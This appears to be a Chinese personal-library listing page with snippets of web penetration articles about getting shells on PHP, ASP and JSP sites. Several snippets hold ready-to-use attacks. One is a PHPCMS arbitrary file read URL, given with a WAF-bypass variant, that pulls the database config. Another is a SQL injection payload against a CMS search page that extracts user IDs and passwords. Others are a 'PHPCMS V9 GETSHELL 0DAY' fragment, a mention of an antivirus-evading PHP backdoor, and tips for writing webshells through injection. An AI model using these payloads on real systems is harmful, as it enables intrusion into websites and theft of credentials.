| 共 99 篇文章 |
|
5.jsp+MYSQL利用数据库拿权限方面基本同php,而且jsp的上传基本很少检查文件后缀,于是只要有注入点与后台,拿shell相当的容易。9.php站无论windows还是linux,都有magic_quotes_gpc的问题,magic_quotes_gpc为on的时候,在server变量注入的时候还是可以select into outfile,今年我搞过某未开源cms就是这个情况,一般情况下为on就别考虑写文件... 阅1153 转7 评0 公众公开 16-03-09 12:07 |
阅32 转0 评0 公众公开 16-03-09 12:07 |
linux服务器被入侵后的那些事。另外linux服务器防御再小提一点!首先很多人拿到服务器如果一看是linux的很多时候他们想到的是反弹,那么我目的就是要阻止你反弹!比如是apache。由于php上传会文件会涉及到临时上传 文件会放在tmp文件下,所以我们不能把tmp封死,但是可以给但是可以让去掉它的执行权限。至于内核升级不建议,会出很多问题,如果... 阅47 转0 评0 公众公开 16-03-09 11:45 |
免杀php一句话后门。http://www.wooyun.org/bugs/wooyun-2013-019299error_reporting(E_ERROR);set_time_limit(0);$pass=''ln'';print_r(''+---------------------------------------------------------------------------+PHPCms V9 GETSHELL 0DAY.code by L.N.apache 适用(利用的apache的解析漏洞)+----------------... 阅313 转1 评0 公众公开 16-03-09 11:45 |
PHPCMS任意文件读取,以及绕过WAF.0x01 先发原版EXP./index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../caches/configs/database.php.0x02 绕过WAF版本。m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=/../configs/database.php. 阅1288 转2 评0 公众公开 16-03-09 11:45 |
$dirstr .= pack(''V'',$this->datastr_len );$datastr .= pack(''V'',0).pack(''V'',0).pack(''V'',0).pack(''v'', strlen($name) );$datastr .= pack(''v'', 0 ).$name.pack(''V'', 0).pack(''V'', 0)... 阅126 转0 评0 公众公开 16-03-09 11:45 |
Use Python to get URL from baidu search.def baidu_search(keyword,pn):res=url.urlopen(''http://www.baidu.com/s?urls_pat=re.compile(r''url'':''(.*?def baidu_url(xk_url):baidu = urllib2.urlopen(''http:''+xk_url)return baidu.url.baidu.url=False.urls = get_url(html)for xk_ur... 阅100 转0 评0 公众公开 16-03-09 11:45 |
XSS_PHP_TXT.1.无论什么站,无论什么语言,我要渗透,第一件事就是扫目录,最好一下扫出个上传点,直接上传shell,诸位不要笑,有时候你花很久搞一个站,最后发现有个现成的上传点,而且很容易猜到,不过这种情况发生在asp居多!2.asp(aspx)+MSSQL先考虑注入,一般的注入都有DBowner权限可以直接写shell;如果写不了,或者web与数据库分离,... 阅5 转0 评0 公众公开 16-03-09 11:45 |
XSS_JSP_MYSQL一.基础知识1.MYSQL的版本4.0以下,4.0以上,5.0以上。4.0以下不支持union查询4.0以上magic_quotes_gpc默认为on5.0以上可以暴表暴列,支持跨库information_schema2.magic_quotes_gpc=on当php.ini里的 magic_quotes_gpc 为On 时。提交的变量中所有的 '' (单引号), '' (双引号), \(反斜线) and 空字符会自动转为含... 阅47 转0 评0 公众公开 16-03-09 11:45 |
https://github.com/yuxiaokui/python。xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a.如果提示Safe Alert: Request Error step 2 !那么直接用下面的expxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\''`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,... 阅132 转0 评0 公众公开 16-03-09 11:39 |
